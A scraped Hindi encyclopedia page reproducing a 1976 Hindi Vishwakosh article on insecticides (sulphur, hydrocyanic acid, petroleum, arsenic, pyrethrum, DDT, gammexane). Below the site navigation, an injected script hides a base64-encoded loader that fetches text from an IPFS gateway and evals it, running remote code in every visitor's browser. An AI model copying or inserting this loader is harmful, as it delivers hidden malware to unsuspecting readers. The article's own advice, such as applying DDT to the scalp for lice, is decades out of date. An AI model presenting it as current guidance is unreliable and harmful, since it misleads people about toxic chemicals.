कीटनाशक

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

चित्र:Tranfer-icon.png यह लेख परिष्कृत रूप में भारतकोश पर बनाया जा चुका है। भारतकोश पर देखने के लिए यहाँ क्लिक करें
लेख सूचना
कीटनाशक
पुस्तक नाम हिन्दी विश्वकोश खण्ड 3
पृष्ठ संख्या 32
भाषा हिन्दी देवनागरी
संपादक सुधाकर पांडेय
प्रकाशक नागरी प्रचारणी सभा वाराणसी
मुद्रक नागरी मुद्रण वाराणसी
संस्करण सन्‌ 1976 ईसवी
उपलब्ध भारतडिस्कवरी पुस्तकालय
कॉपीराइट सूचना नागरी प्रचारणी सभा वाराणसी
लेख सम्पादक कपिलदेव व्यास

कीटनाशक (Insecticides) वे वस्तुएँ हैं जिनके संपर्क में आने पर कीड़े मकोड़े मर जाते हैं। कीटनाशक तीन प्रकार से कार्य करते हैं।

  • जीवद्रव्य (Protoplasm) पर विषवत्‌ क्रिया करके, जैसे अम्ल और क्षार; (ख)
  • श्वासावरोध करके, जैसे तैलादि;
  • तंत्रिकातंत्र पर विषवत्‌ क्रिया करके, जैसे क्लोरोफार्म।

कीटनाशक पदार्थ विलयन, पायस, पाउडर (चूर्ण), वाष्प या धुएँ के रूप में प्रयुक्त किए जाते हैं अथवा भोजन में मिश्रित करके।

सुश्रुत के अनुसार गुग्गुल, धूप और अगर का धुँआ कीटनाशक है। जलते गंधक का धुआँ भी कीट तथा कृमि को नष्ट कर देता है। गंधक चूर्ण (पाउडर) के रूप में अथवा मिट्टी के तेल में पायस बनाकर उपयुक्त किया जाता है।

हाइड्रोसायनिक अम्ल (Hydrocyanic Acid)

जीव मात्र के लिए अत्यंत विषैली गैस है और हर जीव जंतु, कीड़े मकोड़े, जैसे मक्खी, खटमल, झींगुर, तेल चट्टा, कनखजूरा आदि कृमियों तथा चूहों को, जिनपर गंधक का कोई प्रभाव नहीं पड़ता, शीघ्र ही नष्ट कर देता है।

कार्बन डाइसल्फाइड-यह बड़ा शक्तिशाली कीटनाशक है। तुरंत सब कृमियों को नष्ट कर देता है।

पैट्रोलियम अथवा खनिज तैल

यह मिट्टी के तेल (केरोसीन ऑयल) के रूप में प्राय: काम में लाया जाता है। पेट्रोलियम से उत्पन्न गैसोलीन, क्रूड ऑयल, आदि भी उपयोगी कीटनाशक हैं। पेट्रोलियम को मच्छर और उनके अंडे बच्चों का नाश करने के लिए अधिकतर काम में लाते हैं। एक आउंस पेट्रोलियम पंद्रह वर्ग फुट जल की सतह के लिये पर्याप्त होता है। पेट्रोलियम के छिड़काव से खटमल, मक्खी और पिस्सू नष्ट हो जाते हैं।

कोयले का तेल (कोल ऑयल) यह फव्वारे के रूप में जूँ का विनाशक है।

संखिया (आर्सेनिक)

यह बहुतायत से पेरिस ग्रीन के रूप में मच्छर के विनाश के लिए पानी की सतह पर छिड़का जाता है। सोडियम आर्सिनाइट का विलयन किलनी और मक्खियों को मारने में उपयोगी है।

पाईथ्रोम का चूर्ण (पाउडर) भी अच्छा कीटनाशक है और बहुतायत से प्रयुक्त किया जाता है। यह धातु, कपड़े और रंग को खराब नहीं करता। इनके विलयन का फुहार मच्छड़ का नाश करने में उपयोगी सिद्ध हुआ है।

डी. डी. टी.अथवा डाइकोफेन (डाइक्लोर-डाइफिनाइल-ट्राइक्लोर-एथेन)

यह श्वेत रंग के चूर्ण या छोटे-छोटे दाने के रूप में होता है। इसमें कोई विशेष गंध नहीं होती। यह जल में नहीं घुलता, किंतु बेनज़ीन और कार्बन टेट्राक्लोराइड में तुरंत घुल जाता है। एक भाग डी. डी. टी. पचास भाग ऐलकोहल में और दस भाग मिट्टी के तेल अथवा और किसी तेल में घुल जाता है। आज तक जितने भी कीटनाशकों का आविष्कार हुआ है उनमें डी. डी. टी. सबसे अधिक प्रभावशाली और उपयोगी सिद्ध हुआ है। यह मच्छर-मक्खी, तेलचट्टा, खटमल, पिस्सू, और उनके अंडों को नष्ट करने के लिये तेल या जल में विलयन या पायस बनाकर, अथवा सूखा ही, सब प्रकार के कीड़ों का नाश करने के लिए उपयोग में लाया जाता है। पाँच प्रतिशत डी. डी. टी मिट्टी के तेल में घुलाकर प्रयुक्त किया जाता है। इसकी सबसे बड़ी विशेषता यह है कि इसका प्रभाव कई सप्ताह तक रहता है ।

जूँ मारने के लिये दो प्रतिशत डी. डी. टी. पर्याप्त है। यदि इस एक बार सिर में लगा दिया जाए और कुछ समय तक बाल न धोए जाए तो जूँ और उनके अंडे बच्चे समूल नष्ट हो जाते हैं।

गैमेक्सीन

यह भी तीव्रतम कीटनाशक है। यह श्वेत मणिभीय चूर्ण होता है। इसका आधा प्रतिशत जल अथवा मिट्टी के तेल में घुलाकर बहुतायत से सब प्रकार के कीड़े मकोड़ों को नष्ट करने के लिए प्रयुक्त होता है। यह मच्छर, नाली, कूड़ा, करकट, पाँस, कंपोस्ट आदि के कीड़ों को मारने के काम में आजकल प्राय: आता है।

टीका टिप्पणी और संदर्भ